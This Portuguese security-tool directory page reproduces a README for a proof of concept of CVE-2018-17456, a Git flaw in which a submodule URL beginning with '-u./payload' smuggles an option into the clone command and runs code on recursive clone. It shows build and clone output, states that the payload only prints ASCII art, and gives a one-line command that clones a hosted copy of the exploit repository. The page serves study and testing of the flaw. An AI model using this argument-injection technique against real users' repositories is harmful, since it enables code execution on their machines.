Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-17456 — Reprodução da vulnerabilidade CVE-2018-17456 (PoC+Exp) | Kitploit
Ferramentas/GitHubGitHub/anonymking/cve-2018-17456
Análise de VulnerabilidadesAnálise de CódigoExploraçãoSegurança da Cadeia de SuprimentosAprendizado e EducaçãoExploração de Binários
GitHubanonymking/cve-2018-17456

CVE-2018-17456

Reprodução da vulnerabilidade CVE-2018-17456 (PoC+Exp)

Ver Repositório
5há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-17456

Visão geral da vulnerabilidade

  • Nome da vulnerabilidade: Vulnerabilidade de erro de validação de entrada do Git
  • ID CNNVD: CNNVD-201810-234
  • Nível de perigo: Crítico
  • ID CVE: CVE-2018-17456
  • Tipo de vulnerabilidade: Erro de validação de entrada
  • Data de publicação: 2018-10-08
  • Tipo de ameaça: Remota
  • Data de atualização: 2019-04-25
  • Fornecedor: debian
  • Fonte da vulnerabilidade: Atlassian, TerryZh...
  • Descrição: Git é um sistema de controle de versão distribuído gratuito e de código aberto. Existe uma vulnerabilidade de erro de validação de entrada no Git. Esta vulnerabilidade decorre do fato de o sistema de rede ou produto não validar corretamente os dados de entrada. As seguintes versões são afetadas: versões anteriores ao Git 2.14.5, versões 2.15.x anteriores a 2.15.3, versões 2.16.x anteriores a 2.16.5, versões 2.17.x anteriores a 2.17.2, versões 2.18.x anteriores a 2.18.1, versões 2.19.x anteriores a 2.19.1.

Reprodução da vulnerabilidade

  • Devido a problemas de segurança do GitHub, não é possível enviar projetos maliciosos, então você pode executar o script build.sh para construir este projeto localmente para estudo e teste.
  • A versão do Git que usei foi git-2.12.1
  • O processo e o resultado são os seguintes:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/
[master (root-commit) 5b1e97c] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'...
done.
[master (root-commit) ed1914d] CVE-2018-17456
 3 files changed, 6 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 exploit:exploit
 create mode 100755 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir



[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test
Cloning into 'test'...
done.
Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit'
Cloning into 'exploit'...


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed
Failed to clone 'exploit:exploit' a second time, aborting
  • O código malicioso que construí no payload apenas exibe um Buda; portanto, ver o Buda significa que o teste foi bem-sucedido. Na verdade, isso é exibido duas vezes porque há uma tentativa de repetição quando o clone do submódulo falha.

Referências

  • Projeto poc-submodule

Descoberta acidental

  • Eu consegui construir este projeto no Coding — CVE-2018-17456
  • Modo de uso:
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • Além disso, recomendo estudar duas vulnerabilidades semelhantes juntas: CVE-2017-1000117, CVE-2018-11235
Baixar ferramenta